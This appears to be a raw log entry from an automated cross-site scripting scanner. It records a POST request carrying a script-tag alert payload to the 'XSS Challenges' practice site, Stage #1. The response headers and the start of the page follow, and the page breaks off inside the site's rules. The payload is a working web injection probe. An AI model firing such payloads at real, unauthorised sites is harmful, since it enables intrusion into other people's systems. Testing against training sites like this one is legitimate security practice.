POST https://xss-quiz.int21h.jp/?sid=cfb6c997fc170746761dda3e16f2062c6f5efd32/?sid=5ea18a83d86914179f91e4481c4421c2c1dd0896 with payload: p1=xss_test=POST body: param=<script>alert('XSS')</script> - Status: 200
Injection Point: POST Body: p1=xss_test=POST body: param=<script>alert('XSS')</script>
Response Headers: {'Date': 'Tue, 12 Nov 2024 19:23:43 GMT', 'Server': 'Apache', 'Expires': 'Thu, 19 Nov 1981 08:52:00 GMT', 'Cache-Control': 'no-store, no-cache, must-revalidate', 'Pragma': 'no-cache', 'Set-Cookie': 'PHPSESSID=d15mng89uage7jl077rfeq8n64; path=/', 'Upgrade': 'h2,h2c', 'Connection': 'Upgrade, Keep-Alive', 'Vary': 'Accept-Encoding', 'Content-Encoding': 'gzip', 'X-Content-Type-Options': 'nosniff', 'X-Frame-Options': 'sameorigin', 'Strict-Transport-Security': 'max-age=315360000;', 'Content-Length': '1105', 'Keep-Alive': 'timeout=5, max=100', 'Content-Type': 'text/html; charset=UTF-8'}
Response Body: <html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=euc-jp">
  <link rel="stylesheet" type="text/css" href="style.css">
  <script language="JavaScript" type="text/javascript" src="script.js"></script>
  <title>XSS Challenges (by yamagata21) - Stage #1</title>
</head>
<body><div>
<h1>XSS Challenges</h1> <!-- Cross Site Scripting (XSS) Quiz -->
<h2>Stage #1</h2>
<b>Notes (for all stages):</b><br>
<u>* NEVER DO ANY ATTACKS EXCEPT XSS.</u><br>
<u><b>* <font color=red>DO NOT U...

